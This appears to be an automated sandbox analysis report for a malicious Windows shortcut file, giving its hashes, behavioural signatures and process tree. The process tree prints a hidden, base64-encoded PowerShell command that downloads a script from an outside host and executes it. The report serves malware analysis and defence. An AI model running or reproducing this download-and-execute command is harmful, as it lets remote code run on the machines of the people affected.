Analysis
Max time kernel: 121s
Max time network: 122s
Platform: windows7_x64
Resource: win7-20240221-en
Resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
Submitted: 05-04-2024 14:46
Static task: static1

Behavioral task: behavioral1
  Sample: DOC1718 - 17181718.lnk
  Resource: win7-20240221-en
  4 signatures, 150 seconds

Behavioral task: behavioral2
  Sample: DOC1718 - 17181718.lnk
  Resource: win10v2004-20240226-en
  6 signatures, 150 seconds
General
Target: DOC1718 - 17181718.lnk
Size: 9KB
MD5: b2f8f92b1a74fcbe95a7a9cd50994785
SHA1: a124648dddeaaef25245643f98df6c50ec693b94
SHA256: ba41a32b699a07b7a0d7871839ef0c86a9eae01a3277c151a24d288919832fff
SHA512: 1107e818462ad8f8f9a13f052df590c6a964a6d79aa33fc0fb91eda9ab1b05eaca64bab604834d092d57f232a188b94403125569dee9f0cdb61983a6b7c3f7e6
SSDEEP: 192:8z5P5hm3MSBf2TL52FWGkOlRKAaqPVpVIZhVjjpOW234jXAc0y:u53cMS5ZFbkO3KYyftoy
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    PID 2596  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    Description: Token: SeDebugPrivilege  PID 2596  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description, PID, process, target process):
    PID 1660 wrote to memory of 2596  1660  cmd.exe  powershell.exe
    PID 1660 wrote to memory of 2596  1660  cmd.exe  powershell.exe
    PID 1660 wrote to memory of 2596  1660  cmd.exe  powershell.exe
Processes

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\DOC1718 - 17181718.lnk"
   PID: 1660
   Signatures: Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 1660)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -WindowStyle Hidden -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBpAG0AYQBuAGkAawB1AHUALgBjAG8AbQAvAGQAbwBuAGUALgB0AHgAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAIAB8ACAAaQBOAHYATwBrAEUALQBFAHgAUAByAGUAUwBzAGkATwBuAA==
      PID: 2596
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken